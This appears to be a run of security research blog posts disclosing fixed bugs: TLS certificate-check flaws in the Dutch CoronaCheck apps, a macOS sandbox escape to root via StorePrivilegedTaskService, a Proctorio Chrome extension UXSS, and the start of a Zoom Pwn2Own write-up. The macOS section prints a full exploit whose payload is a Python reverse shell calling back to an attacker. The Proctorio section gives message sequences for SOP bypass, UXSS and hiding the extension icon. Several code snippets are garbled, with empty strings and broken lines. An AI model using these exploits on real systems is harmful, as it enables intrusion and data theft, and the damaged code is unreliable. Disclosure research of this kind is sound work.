  • A future update for the app could add an ATS exception or an update to iOS might change the ATS rules. Adding an ATS exception is not as unrealistic as it may sound: the app contains a trusted root that is not included in the iOS trust store (“Staat der Nederlanden Private Root CA - G1”). To actually use that root would require an ATS exception.
  • A malicious CA could issue a certificate using the serial number and authority key information of one of the trusted certificates. This certificate would be accepted by ATS and pass all checks. A reliable CA would not issue such a certificate, but it does mean that the certificate pinning that was part of the requirements was not effective.

Other issues

We found a number of other issues in the verification of certificates. These are of lower impact.

Subject Alternative Names

In the past, the Common Name field was used to indicate which domain a certificate was for. This was inflexible, because it meant each certificate was only valid for one domain. The Subject Alternative Name (SAN) extension was added to make it possible to add more domain names (or other types of names) to certificates. To correctly verify if a certificate is valid for a domain, the SAN extension has to be checked.

Obtaining the SANs from a certificate was implemented by using OpenSSL to generate a human-readable representation of the SAN extension and then parsing that. This did not take into account the possibility of name types other than a domain name, such as an email address in a certificate used for S/MIME. The parsing could be confused using specially formatted email addresses to make it match any domain name.

SecurityStrategy.swift lines 114 to 127:

114 func compareSan(_ san: String, name: String) -> Bool {
116    let sanNames = san.split(separator: ",")
117    for sanName in sanNames {
118        // SanName can be like DNS: *
119        let pattern = String(sanName)
120            .replacingOccurrences(of: "DNS:", with: "", options: .caseInsensitive)
121            .trimmingCharacters(in: .whitespacesAndNewlines)
122        if wildcardMatch(name, pattern: pattern) {
123            return true
124        }
125    }
126    return false

For example, an S/MIME certificate containing the email address "a,*,b" (which is a valid email address) would result in a wildcard domain (*) that matches all hosts.
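
The confusion is easy to reproduce. The following Python sketch is our re-implementation of the compareSan logic above, applied to that email address:

from fnmatch import fnmatch

# Re-implementation of compareSan: split the human-readable SAN string on
# commas, strip a "DNS:" prefix, and do a wildcard match on each part.
def compare_san(san, name):
    for san_name in san.split(","):
        pattern = san_name.replace("DNS:", "").strip()
        if fnmatch(name, pattern):
            return True
    return False

# The email SAN "a,*,b" is split into three parts; the middle "*" part
# matches every host name.
print(compare_san("email:a,*,b", ""))  # True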

CMS signatures

The domain name check for the certificate used to generate the CMS signature of the response did not compare the full domain name; instead, it checked that a specific string occurred in the domain ( and that it ended with a specific suffix (.nl). This means that an attacker with a certificate for could also CMS sign API responses.

OpenSSL.m lines 259 to 278:

259 - (BOOL)validateCommonNameForCertificate:(X509 *)certificate
260                         requiredContent:(NSString *)requiredContent
261                          requiredSuffix:(NSString *)requiredSuffix {
263    // Get subject from certificate
264    X509_NAME *certificateSubjectName = X509_get_subject_name(certificate);
266    // Get Common Name from certificate subject
267    char certificateCommonName[256];
268    X509_NAME_get_text_by_NID(certificateSubjectName, NID_commonName, certificateCommonName, 256);
269    NSString *cnString = [NSString stringWithUTF8String:certificateCommonName];
271    // Compare Common Name to required content and required suffix
272    BOOL containsRequiredContent = [cnString rangeOfString:requiredContent options:NSCaseInsensitiveSearch].location != NSNotFound;
273    BOOL hasCorrectSuffix = [cnString hasSuffix:requiredSuffix];
275    certificateSubjectName = NULL;
277    return hasCorrectSuffix && containsRequiredContent;

The only issue we found in the Android implementation is similar: the check for the CMS signature used a regex to check the name of the signing certificate. This regex was not bound on the right, which also made it possible to bypass it with a similarly crafted domain name.

SignatureValidator.kt lines 94 to 96:

94 fun cnMatching(substring: String): Builder {
95    return cnMatching(Regex(Regex.escape(substring)))

SignatureValidator.kt lines 142 to 149:

if (cnMatchingRegex != null) {
    if (!JcaX509CertificateHolder(signingCertificate).subject.getRDNs(BCStyle.CN).any {
            val cn = IETFUtils.valueToString(it.first.value)
        }) {
        throw SignatureValidationException("Signing certificate does not match expected CN")

Because these certificates had to be issued by PKI-Overheid (a CA run by the Dutch government), it might not have been easy to obtain a certificate with such a domain name.
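
Both weak checks are easy to demonstrate. The following Python sketch is our illustration, not the apps' code; the expected CN "" and the attacker domain "" are assumed example values:

import re

# iOS check (described above): the CN must contain "" and end in ".nl".
def ios_cn_ok(cn):
    return "" in cn.lower() and cn.endswith(".nl")

# Android check: a regex built from an escaped literal, not anchored on the right.
android_re = re.compile(re.escape(""))

print(ios_cn_ok(""))                          # True
print(bool(""))      # True
print(bool(android_re.fullmatch("")))  # False: anchoring fixes it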

Race condition

We also found a race condition in the application of the certificate validation rules. As mentioned, the rules the app applied for certificate validation were stricter for VWS connections than for connections to test providers, and even for connections to VWS there were different levels of strictness. However, if two requests were performed in quick succession, the first request could be validated using the verification rules specified for the second request. In practice, even the least strict verification rules still require a valid certificate, so this could not be used to intercept connections either. The race was however already triggering in normal use, as the app initiates two requests with different validation rules immediately after starting.


We reported these vulnerabilities to the email address on the “Kwetsbaarheid melden” (Report a vulnerability) page on June 30th, 2021. This email bounced because the address did not exist. We had to reach out through other channels to find a working address. We received an acknowledgement that the message was received, but no further updates. The vulnerabilities were fixed quietly, without letting us know that they were fixed.

In October we decided to look at the code on GitHub to check if all issues were resolved correctly. While most issues were fixed, one was not fixed properly. We sent another email detailing this issue. This was again fixed without informing us.

Developers are of course not required to keep us in the loop when we report a vulnerability, but this does show that if they had, we could have caught the incorrect fix much earlier.


TLS certificate validation is a complex process. This case demonstrates that adding more checks is not always better, because they might interfere with the normal platform certificate validation. We recommend changing the certificate validation process only if absolutely necessary. Any extra checks should have a clear security goal. Checks such as “the domain must contain the string …” (instead of “must end with …”) have no security benefit and should be avoided.

Certificate pinning not only has implementation challenges, but also operational challenges. If a certificate renewal has not been properly planned, then it may leave an app unable to connect. This is why we usually recommend pinning only for applications handling very sensitive user data. Other checks can be implemented to address the risk of a malicious or compromised CA with much less chance of problems, for example checking the revocation and Certificate Transparency status of a certificate.


We found and reported a number of issues in the verification of TLS certificates used for the connections of the Dutch CoronaCheck apps. These vulnerabilities could have been combined to bypass certificate pinning in the app. In most cases, this could only be abused by a compromised or malicious CA or if a specific CA could be used to issue a certificate for a certain domain. These vulnerabilities have since then been fixed.

Sandbox escape + privilege escalation in StorePrivilegedTaskService

21 December 2021 at 00:00

CVE-2021-30688 is a vulnerability which was fixed in macOS 11.4 that allowed a malicious application to escape the Mac Application Sandbox and to escalate its privileges to root. This vulnerability required a strange exploitation path due to the sandbox profile of the affected service.


At rC3 in 2020 and HITB Amsterdam 2021 Daan Keuper and Thijs Alkemade gave a talk on macOS local security. One of the subjects of this talk was the use of privileged helper tools and the vulnerabilities commonly found in them. To summarize, many applications install a privileged helper tool in order to install updates for the application. This allows normal (non-admin) users to install updates, which is normally not allowed due to the permissions on /Applications. A privileged helper tool is a service which runs as root and is used for only a specific task that needs root privileges. In this case, that task could be installing a package file.

Many applications that use such a tool contain two vulnerabilities that in combination lead to privilege escalation:

  1. Not verifying if a request to install a package comes from the main application.
  2. Not correctly verifying the authenticity of an update package.

As it turns out, the first issue not only affects third-party developers, but even Apple itself! Although in a slightly different way…

About StorePrivilegedTaskService

StorePrivilegedTaskService is a tool used by the Mac App Store to perform certain privileged operations, such as removing the quarantine flag of downloaded files, moving files and adding App Store receipts. It is an XPC service embedded in the AppStoreDaemon.framework private framework.

To explain this vulnerability, it would be best to first explain XPC services and Mach services, and the difference between those two.

First of all, XPC is an inter-process communication technology developed by Apple which is used extensively to communicate between different processes in all of Apple’s operating systems. In iOS, XPC is a private API, usable only indirectly by APIs that need to communicate with other processes. On macOS, developers can use it directly. One of the main benefits of XPC is that it sends structured data, supporting many data types such as integers, strings, dictionaries and arrays. This can in many cases avoid the use of serialization functions, which reduces the possibility of vulnerabilities due to parser bugs.

XPC services

An XPC service is a lightweight process related to another application. These are launched automatically when an application initiates an XPC connection and terminated after they are no longer used. Communication with the main process happens (of course) over XPC. The main benefit of using XPC services is the ability to separate dangerous operations or privileges, because the XPC service can have different entitlements.

For example, suppose an application needs network functionality for only one feature: to download a fixed URL. This means that when sandboxing the application, it would need full network client access (i.e. the entitlement). A vulnerability in this application can then also use the network access to send out arbitrary network traffic. If the functionality for performing the request would be moved to a different XPC service, then only this service would need the network permission. Compromising the main application would only allow it to retrieve that URL and compromising the XPC service would be unlikely, as it requires very little code. This pattern is how Apple uses these services throughout the system.

These services can have one of three possible service types:

  • Application: each application initiating a connection to an XPC service spawns a new process (though multiple connections from one application are still handled in the same process).
  • User: per user only one instance of an XPC service is running, handling requests from all applications running as that user.
  • System: only one instance of the XPC service is running and it runs as root. Only available for Apple’s own XPC services.

Mach services

While XPC services are local to an application, Mach services are accessible for XPC connections system wide by registering a name. A common way to register this name is through a launch agent or launch daemon config file. This can launch the process on demand, but the process is not terminated automatically when no longer in use, like XPC services are.

For example, some of the Mach services of lsd:



Connecting to an XPC service using the NSXPCConnection API:

[[NSXPCConnection alloc] initWithServiceName:serviceName];

while connecting to a mach service:

[[NSXPCConnection alloc] initWithMachServiceName:name options:options];

NSXPCConnection is a higher-level Objective-C API for XPC connections. When using it, an object with a list of methods can be made available to the other end of the connection. The connecting client can call these methods just like it would call any normal Objective-C methods. All serialization of objects as arguments is handled automatically.


XPC services in third-party applications rarely have permissions that are interesting to steal. Sandboxed services can have entitlements that create sandbox exceptions, for example to allow the service to access the network, but to a non-sandboxed application these entitlements are not interesting, because it is not subject to those restrictions in the first place. TCC permissions are also usually set for the main application, not its XPC services (as that would generate rather confusing prompts for the end user).

A non-sandboxed application can therefore almost never gain anything by connecting to the XPC service of another application. The template for creating a new XPC service in Xcode does not even include a check on which application has connected!

This does, however, appear to give developers a false sense of security because they often do not add a permission check to Mach services either. This leads to the privileged helper tool vulnerabilities discussed in our talk. For Mach services running as root, a check on which application has connected is very important. Otherwise, any application could connect to the Mach service to request it to perform its operations.

StorePrivilegedTaskService vulnerability

Sandbox escape

The main vulnerability in the StorePrivilegedTaskService XPC service was that it did not check the application initiating the connection. This service has a service type of System, so it would launch as root.

This vulnerability was exploitable because two defense-in-depth measures turned out to be ineffective:

  • StorePrivilegedTaskService is sandboxed, but its custom sandboxing profile is not restrictive enough.
  • For some operations, the service checked the paths passed as arguments to ensure they are a subdirectory of a specific directory. These checks could be bypassed using path traversal, as the sketch after this list illustrates.
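
A path prefix check that can be bypassed this way typically looks like the following Python sketch. This is our illustration of the pattern, not Apple's code; the directory is the AssetPacks location that appears in the exploit later:

import os.path

allowed_root = "/System/Library/Caches/OnDemandResources/AssetPacks"
requested = allowed_root + "/../../../../../../Library/Apple/System/Library/CoreServices"

# Naive check: a string prefix comparison on the raw, unnormalized path.
print(requested.startswith(allowed_root))  # True: the check passes

# What the filesystem actually resolves after normalizing the ".." components.
print(os.path.normpath(requested))  # /Library/Apple/System/Library/CoreServices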

This XPC service is embedded in a framework. This means that even a sandboxed application could connect to the XPC service, by loading the framework and then connecting to the service.

[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];

NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@""];

The XPC service offers a number of interesting methods that can be called from the application using an NSXPCConnection. For example:

// Write a file
- (void)writeAssetPackMetadata:(NSData *)metadata toURL:(NSURL *)url withReplyHandler:(void (^)(NSError *))replyHandler;
 // Delete an item
- (void)removePlaceholderAtPath:(NSString *)path withReplyHandler:(void (^)(NSError *))replyHandler;
// Change extended attributes for a path
- (void)setExtendedAttributeAtPath:(NSString *)path name:(NSString *)name value:(NSData *)value withReplyHandler:(void (^)(NSError *))replyHandler;
// Move an item
- (void)moveAssetPackAtPath:(NSString *)path toPath:(NSString *)toPath withReplyHandler:(void (^)(NSError *))replyHandler;

A sandbox escape was quite clear: write a new application bundle, use the method -setExtendedAttributeAtPath:name:value:withReplyHandler: to remove its quarantine flag and then launch it. However, this also needs to take into account the sandbox profile of the XPC service.

The service has a custom profile. The restrictions related to files and folders are:

(allow file-read* file-write*
        (vnode-type DIRECTORY)
            (literal "/Library/Application Support/App Store")
            (regex #"\.app(download)?(/Contents)?")
            (regex #"\.app(download)?/Contents/_MASReceipt(\.sb-[a-zA-Z0-9-]+)?")))
        (vnode-type REGULAR-FILE)
            (literal "/Library/Application Support/App Store/adoption.plist")
            (literal "/Library/Preferences/")
            (regex #"\.appdownload/Contents/placeholderinfo")
            (regex #"\.appdownload/Icon")
            (regex #"\.app(download)?/Contents/_MASReceipt((\.sb-[a-zA-Z0-9-]+)?/receipt(\.saved)?)"))) ;covers temporary files the receipt may be named

    (subpath "/System/Library/Caches/")
    (subpath "/System/Library/Caches/OnDemandResources")

The intent of these rules is that this service can modify specific files in applications currently being downloaded from the App Store, i.e. with a .appdownload extension. For example, adding a MASReceipt file and changing the icon.

The regexes here are the most interesting, mainly because they are anchored neither on the left nor on the right. On the left this makes sense, as the full path prefix could be unknown, but the lack of anchoring on the right (with $) is a mistake for the file regexes, as the sketch after the list below demonstrates.

Formulated simply, we can do the following with this sandboxing profile:

  • All operations are allowed on directories containing .app anywhere in their path.
  • All operations are allowed on files containing .appdownload/Icon anywhere in their path.
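
The effect of the missing right anchor is easy to see with Python's re module (our sketch; the path is an example inside the app's temporary directory):

import re

# The two file/folder regexes from the profile, unanchored as in the original.
dir_rule = re.compile(r"\.app(download)?(/Contents)?")
file_rule = re.compile(r"\.appdownload/Icon")

path = "/tmp/com.example.sandboxed/bar.appdownload/Icon/Contents/MacOS/payload"

# An unanchored search matches any path that merely contains the pattern.
print(bool(   # True
print(bool(  # True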

By creating a specific directory structure in the temporary files directory of our sandboxed application:


Both the sandboxed application and the StorePrivilegedTaskService have full access inside the Icon folder. Therefore, it would be possible to create a new application here and then use -setExtendedAttributeAtPath:name:value:withReplyHandler: on the executable to dequarantine it.


This was already a nice vulnerability, but we were convinced we could escalate privileges to root as well. Having a process running as root creating new files in chosen directories with specific contents is such a powerful primitive that privilege escalation should be possible. However, the sandbox requirements on the paths made this difficult.

Creating a new launch daemon or cron job is a common way to escalate privileges through file creation, but the path requirements of the sandbox profile would only allow writing to a subdirectory of a subdirectory of the directories for these config files, so this did not work.

An option that would work would be to modify an application. In particular, we found that Microsoft Teams would work. Teams is one of the applications that installs a launch daemon for installing updates. However, instead of copying a binary to /Library/PrivilegedHelperTools, the daemon points into the application bundle itself:


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">

The following would work for privilege escalation:

  1. Ask StorePrivilegedTaskService to move /Applications/Microsoft Teams.app somewhere else. Allowed, because the path of the directory contains .app.1
  2. Move a new app bundle to /Applications/Microsoft Teams.app, which contains a malicious executable file at Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon.
  3. Connect to the daemon's Mach service.

However, a privilege escalation requiring a specific third-party application to be installed is not as convincing as a privilege escalation without this requirement, so we kept looking. The requirements are somewhat contradictory: typically anything bundled into an .app bundle runs as a normal user, not as root. In addition, the Signed System Volume on macOS Big Sur means changing any of the built-in applications is also impossible.

By an impressive and ironic coincidence, there is an application which is installed on a new macOS installation, is not on the SSV and runs automatically as root: MRT.app, the “Malware Removal Tool”. Apple has implemented a number of anti-malware mechanisms in macOS. These are all updateable without performing a full system upgrade, because they might be needed quickly. This means in particular that MRT.app is not on the SSV. Most malware is removed by signature or hash checks for malicious content; MRT is the more heavy-handed solution for when Apple needs to add code for performing the removal.

Although MRT.app is in an app bundle, it is not in fact a real application. At boot, MRT is run as root to check if any malware needs removing.

Our complete attack follows the following steps, from sandboxed application to code execution as root:

  1. Create a new application bundle bar.appdownload/Icon/MRT.app in the temporary directory of our sandboxed application, containing a malicious executable.
  2. Load the AppStoreDaemon.framework framework and connect to the StorePrivilegedTaskService XPC service.
  3. Ask StorePrivilegedTaskService to change the quarantine attribute for the executable file to allow it to launch without a prompt.
  4. Ask StorePrivilegedTaskService to move /Library/Apple/System/Library/CoreServices/MRT.app to a different location.
  5. Ask StorePrivilegedTaskService to move bar.appdownload/Icon/MRT.app from the temporary directory to /Library/Apple/System/Library/CoreServices/MRT.app.
  6. Wait for a reboot.

See the full function here:

/// The bar.appdownload/Icon part in the path is needed to create files where both the sandbox profile of StorePrivilegedTaskService and the Mac App Store sandbox of this process allow access.
NSString *path = [NSTemporaryDirectory() stringByAppendingPathComponent:@"bar.appdownload/Icon/MRT.app"];
NSFileManager *fm = [NSFileManager defaultManager];
NSError *error = nil;

/// Cleanup, if needed.
[fm removeItemAtPath:path error:nil];

[fm createDirectoryAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS"] withIntermediateDirectories:TRUE attributes:nil error:&error];


/// Create the payload. This example uses a Python reverse shell connecting back to the attacker.
[@"#!/usr/bin/env python\n\nimport socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"\",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[\"/bin/sh\",\"-i\"]);" writeToFile:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] atomically:TRUE encoding:NSUTF8StringEncoding error:&error];


/// Make the payload executable
[fm setAttributes:@{NSFilePosixPermissions: [NSNumber numberWithShort:0777]} ofItemAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] error:&error];


/// Load the framework, so the XPC service can be resolved.
[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];

NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@""];
conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(StorePrivilegedTaskInterface)];
[conn resume];

/// The new file is now quarantined, because this process created it. Change the quarantine flag to something which is allowed to run.
/// Another option would have been to use the `-writeAssetPackMetadata:toURL:replyHandler` method to create an unquarantined file.
[conn.remoteObjectProxy setExtendedAttributeAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] name:@"" value:[@"00C3;60018532;Safari;" dataUsingEncoding:NSUTF8StringEncoding] withReplyHandler:^(NSError *result) {
    NSLog(@"%@", result);

    assert(result == nil);

    srand((unsigned int)time(NULL));

    /// Deleting this directory is not allowed by the sandbox profile of StorePrivilegedTaskService: it can't modify the files inside it.
    /// However, to move a directory, the permissions on the contents do not matter.
    /// It is moved to a randomly named directory, because the service refuses if it already exists.
    [conn.remoteObjectProxy moveAssetPackAtPath:@"/Library/Apple/System/Library/CoreServices/MRT.app" toPath:[NSString stringWithFormat:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT%d.app", rand()]
                               withReplyHandler:^(NSError *result) {
        NSLog(@"Result: %@", result);

        assert(result == nil);

        /// Move the malicious directory in place of MRT.app.
        [conn.remoteObjectProxy moveAssetPackAtPath:path toPath:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT.app" withReplyHandler:^(NSError *result) {
            NSLog(@"Result: %@", result);

            /// At launch, /Library/Apple/System/Library/CoreServices/MRT.app is started with the -d flag. So now time to wait for that...


Apple pushed out a fix in the macOS 11.4 release, implementing all three of the recommended changes:

  1. The entitlements of the process initiating the connection to StorePrivilegedTaskService are now checked.
  2. The sandboxing profile of StorePrivilegedTaskService was tightened.
  3. The path traversal vulnerabilities in the subdirectory check were fixed.

This means that the vulnerability is not just fixed, but reintroducing it later is unlikely to be exploitable again due to the improved sandboxing profile and path checks. We reported this vulnerability to Apple on January 19th, 2021 and a fix was released on May 24th, 2021.

  1. This is actually a quite interesting aspect of the macOS sandbox: to delete a directory, the process needs to have file-write-unlink permission on all of the contents, as each file in it must be deleted. To move a directory somewhere else, only permissions on the directory itself and its destination are needed! ↩︎

Proctorio Chrome extension Universal Cross-Site Scripting

14 December 2021 at 00:00

The switch to online exams

In February of 2020 the first person in The Netherlands tested positive for COVID-19, which quickly led to a national lockdown. After that, universities had to close for physical lectures, which meant they quickly had to switch to both online lectures and online tests.

For universities this posed a problem: how do you prevent students from cheating if they take the test in a location where you have no control or visibility? In The Netherlands most universities quickly adopted anti-cheating software that students were required to install in order to take a test, much to the dissatisfaction of students, who found this software too invasive of their privacy. Students were required to run monitoring software on their personal device that would monitor their behaviour via the webcam and screen recording.

The usage of this software was covered by national media on a regular basis, as students fought to stop universities from using this kind of software. This led to several court cases where universities had to defend the usage of this software. The judge ended up ruling in favour of the universities.

Proctorio is one such monitoring tool and it is used by most Dutch universities. For students it comes as a Google Chrome extension. And indeed, the extension has quite an extensive list of permissions, including the recording of your screen and permission to read and change all data on the websites you visit.

All this was reason enough for us to have a closer look at this much debated software. After all, vulnerabilities in this extension could have considerable privacy implications for students who have it installed. In the end, we found a severe Universal Cross-Site Scripting vulnerability, which could be triggered by any website. This means that a malicious website visited by the user could steal or modify data from every other website, if the victim had the Proctorio extension installed. The vulnerability has since been fixed by Proctorio. As Chrome extensions are updated automatically, this requires no action from Proctorio users.


Chrome extensions consist of two parts. A background page with JavaScript is the core of the extension, which has the permissions granted to the extension. It can add scripts to currently open tabs, which are known as content scripts. Content scripts have access to the DOM, but use a separate JavaScript environment. Content scripts do not have the full permissions of the background page, but their ability to communicate with the background page makes them more powerful than the JavaScript on a page itself.
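To make this model concrete, here is a minimal sketch using the standard chrome.runtime messaging API (the message format is made up for illustration; this is not Proctorio's code):

// content-script.js: runs alongside the page, in a separate JavaScript environment
chrome.runtime.sendMessage(["fetch-url", "https://example.com/data"], (reply) => {
    console.log("background page replied:", reply);
});

// background.js: holds the extension's full permissions
chrome.runtime.onMessage.addListener((msg, sender, sendResponse) => {
    // a careful extension would validate the message and the sender here
    if (msg[0] === "fetch-url") {
        fetch(msg[1]).then((r) => r.text()).then(sendResponse);
        return true; // keep the message channel open for the async reply
    }
});

Because the background page acts on whatever messages it receives, any code that can send these messages inherits a slice of the extension's power. That is exactly what the rest of this post exploits.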

Vulnerability details

The Proctorio extension inspects network traffic of the browser. When requests are observed for paths that match supported test taking websites, it injects some content scripts into the page. It tries to determine if the user is using a Proctorio-enabled test by retrieving details of the test using specific API endpoints used by the supported test websites.

Once a test is started, a toolbar is added with a number of buttons allowing a student to manage Proctorio. This includes a button to open a calculator, which supports some simple mathematical calculations.

Proctorio Calculator

When the user clicks the ‘=’ button, a function is called in the content script to compute the result. The computation is performed by calling the eval() function in JavaScript; in the minified JavaScript this is the function named ghij. The function eval() is dangerous, as it can execute arbitrary JavaScript, not just mathematical expressions, and ghij does not check that the input is actually a mathematical expression.
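To illustrate (hypothetical inputs, not taken from the extension): eval() happily runs anything that parses as JavaScript, not just arithmetic:

eval("1 + 2 * 3");              // 7: the intended use of the calculator
eval("alert(document.domain)"); // equally valid input: arbitrary code runs
eval("fetch('https://attacker.example/?c=' + document.cookie)"); // or worse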

Because the calculator is added to the DOM of the page activating Proctorio, JavaScript on the page can automatically enter an expression for the calculator and then trigger the evaluation. This allows the webpage to execute code inside the content script. From the context of the content script, the page can then send messages to the background page that are handled as if they came from the content script. Using a combination of messages, we found we could trigger UXSS.

(In our Zoom exploit, the calculator was opened just to demonstrate our ability to launch arbitrary applications, but in this case we actually exploit the calculator itself!)

Exploitation to UXSS

By using one of a number of specific paths in the URL, adding certain DOM elements and sending specific responses to a small number of API requests Proctorio can be activated by any website without user approval. By pretending to be in demo mode and automatically activating the demo, the page can start a complete Proctorio session. This happens completely automatically, without user interaction. Then, the page can open the calculator and use the exploit to execute code in the content script.

The content script itself does not have the full permissions of the browser extension, but it does have permission to send messages to the background page. The JavaScript on the background page supports a large number of different messages, each identified by a number in the first element of the array that makes up the message.

The first thing that can be done using that is to download a URL while bypassing the Same Origin Policy. There are a number of different message types that will download a URL and return the result. For example, message number 502:

chrome.runtime.sendMessage([502, '1', '2', ''], alert);

(The # is used here to make sure anything which is appended after it is not sent to the server.)

This downloads the URL in the session of the current user and returns the result to the page. This could be used to, for example, retrieve all of the user’s email messages if they are signed in to a webmail service that uses cookies for authentication. Normally, this is not allowed unless the URL uses the same origin, or the response specifically allows it using Cross-Origin Resource Sharing (CORS).
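For comparison, the same cross-origin read attempted from ordinary page JavaScript would fail (sketch; the webmail URL is a made-up example):

// Without CORS headers from the server, SOP prevents the page from reading
// the response of this cross-origin request:
fetch("https://webmail.example.com/inbox", { credentials: "include" })
    .then((r) => r.text())
    .then((body) => console.log(body)) // never reached without CORS
    .catch((err) => console.log("blocked by the Same Origin Policy:", err));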

A CORS bypass is already a serious vulnerability, but it can be extended further. A universal cross-site scripting attack can be performed in the following way.

Some messages trigger the adding of new content scripts to the tab. Sometimes, variables need to be passed to those scripts. Most of the time those variables are escaped correctly, but when using a message with number 25, the argument is not escaped. The minified code for this function is:

if (25 == a[0]) return chrome.tabs.executeScript(b, { // b: the sender's tab id
    code: c0693(a[1])
}, function() {}), c({}), !0;

which calls:

function c0693(a) {
    return "(" + function(a) {
        var b = document.getElementsByTagName("body");
        if (b.length) b[0].innerHTML = a; else {
            b = document.getElementsByTagName("html")[0];
            var c = document.createElement("body");
            c.innerHTML = a;
            b.appendChild(c);
        }
    } + ")(" + a + ");";
}

This function c0693() contains an inner function which is converted to a string. The inner function is not executed by the background page; converting it to a string takes the source text of the function, which is then called with the argument a in the content script. Note that the last line in this function does not escape that value. This means that it is possible to include JavaScript, which is then executed in the context of the content script in the same tab that sent the message.

Evaluating JavaScript in the same tab again is not very useful on its own, but it is possible to make the tab switch origins in between sending the message and the execution of the new script. This is because the call to executeScript specifies the tab id, which doesn’t change when navigating to a different page.

The message with number 507 uses a synchronous XMLHttpRequest, which means that the JavaScript of the entire background page is blocked while waiting for the HTTP response. By sending a 507 message with a URL which is set up to always take 5 seconds to respond, then immediately sending a message with number 25 and then changing the location of the tab, the JavaScript from the 25 message is executed on the new page instead.

For example, the following will allow one origin to execute an alert on another origin:

chrome.runtime.sendMessage([507, '1', '2', '']);

chrome.runtime.sendMessage([25, 'alert(document.domain)']);

document.location = '';

The URL in the first message is used here as an example of a URL that takes 5 seconds to respond.

The video below demonstrates the attack:

Finally, the user could notice the fact that Proctorio is enabled based on the color of the Proctorio icon in the browser bar, which turns green once it activates. However, sending a message [32, false] turns this icon grey again, even though Proctorio is still active. The malicious webpage could quickly turn the icon grey again after exploiting the content script, which means the user only has a few milliseconds to notice the attack.

What can we do with UXSS?

An important security mechanism of your browser is called the Same Origin Policy (SOP). Without SOP surfing the web would be very insecure, as websites would then be able to read data from other domains (origins). It is the most important security control the browser has to enforce.

With a Universal XSS vulnerability, a malicious webpage can run JavaScript on other pages, regardless of the origin. This makes it a very powerful primitive for an attacker to have in a browser. The video below shows that we can use this primitive to obtain a screenshot from the webcam and to download a Gmail inbox, using our exploit from above.

For stealing Gmail data we just need to inject some JavaScript that copies the contents of the inbox and sends them to a server under our control. For the webcam screenshot we rely on the fact that most people will have allowed certain legitimate domains to access the webcam: in particular, users of Proctorio who had to enable their webcam for a test will have given the legitimate test website that permission. We use UXSS to open a tab on such a domain and inject some JavaScript that grabs a webcam screenshot. This could be any page with webcam permission, but due to the pandemic we think a test domain is a pretty safe bet. (The stuffed animal is called Dikkie Dik, from a well known Dutch children’s picture book.)


We contacted Proctorio with our findings on June 18th, 2021. They replied within hours, thanking us for our findings. Within a week (on June 25th) they reported that the vulnerability was fixed and a new version was pushed to the Google Chrome Web Store. We verified that the vulnerability was fixed on August 3rd. Since Google Chrome automatically updates installed extensions, this requires no further action from the end-user. At the time of writing version 1.4.21183.1 is the latest version.

In the fixed version, an iframe is used to load a webpage for the calculator, meaning exploiting this vulnerability is no longer possible.

Installing software on your (personal) device, whether for work or for study, always adds new risks end-users should be aware of. In general it is wise to uninstall software as soon as you no longer need it, in order to mitigate this risk. In this situation one could disable the Proctorio extension and only enable it when taking a test.

Zoom RCE from Pwn2Own 2021

23 August 2021 at 00:00

On April 7 2021, Thijs Alkemade and Daan Keuper demonstrated a zero-click remote code execution exploit in the Zoom video client during Pwn2Own 2021. Now that the related bugs have been fixed for all users (see ZDI-21-971 and ZSB-22003) we can safely detail the bugs we exploited and how we found them. In this blog post, we wanted to not only explain the bugs and our exploit, but provide a log of our entire process. We hope that detailing our process helps others with similar research in the future. While we had profound experience with exploiting memory corruption vulnerabilities on many platforms, both of us had zero experience with this on Windows, so during this project we had a lot to learn about Windows internals.

Wow - with just 10 seconds left of their 2nd attempt, Daan Keuper and Thijs Alkemade were able to demonstrate their code execution via Zoom messenger. 0 clicks were used in the demo. They're off to the disclosure room for details. #Pwn2Own

— Zero Day Initiative (@thezdi) April 7, 2021

This is going to be quite a long post. So before we dive into the details, now that the vulnerabilities have been fixed, below you can see a full run of the exploit in action. The post hereafter will explain in detail every step that took place during the exploitation phase and how we came to this solution.


Participating in Pwn2Own was one of the initial goals we had for our new research department, Sector 7. When we made our plans last year, we didn’t expect that it would be as soon as April 2021. In recent years the Vancouver edition in spring has focused on browsers, local privilege escalation and virtual machines. The software in these categories has received a lot of attention to security, including many specific defensive layers. We’d also be competing with many others who may have had a full year to prepare their exploits.

To our surprise, on January 27th Pwn2Own was officially announced with a new category: “Enterprise Communications”, featuring Microsoft Teams and the Zoom Meetings client. These tools have become incredibly important due to the pandemic, so it makes sense for those to be added to Pwn2Own. We realized that either of these would be a much better target for us, because most researchers would have to start from scratch.

Announcing #Pwn2Own Vancouver 2021! Over $1.5 million available across 7 categories. #Tesla returns as a partner, and we team up with #Zoom for the new Enterprise Communications category. Read all the details at #P2O

— Zero Day Initiative (@thezdi) January 26, 2021

We had not yet decided between Zoom and Microsoft Teams. We made a guess for what type of vulnerability we would expect could lead to RCE in those applications: Microsoft Teams is developed using Electron with a few native libraries in C++ (mainly for platform integration). Electron apps are built using HTML+JavaScript with a Chromium runtime included. The most likely path for exploitation would therefore be a cross-site scripting issue, possibly in combination with a sandbox escape. Memory corruption could be possible, but the number of native libraries is small. Zoom is written in C++, meaning the most likely vulnerability class would be memory corruption. Without any good data on which would be more likely, we decided on Zoom, simply because we like doing research on memory corruption more than XSS.

Step 1: What is this “Zoom”?

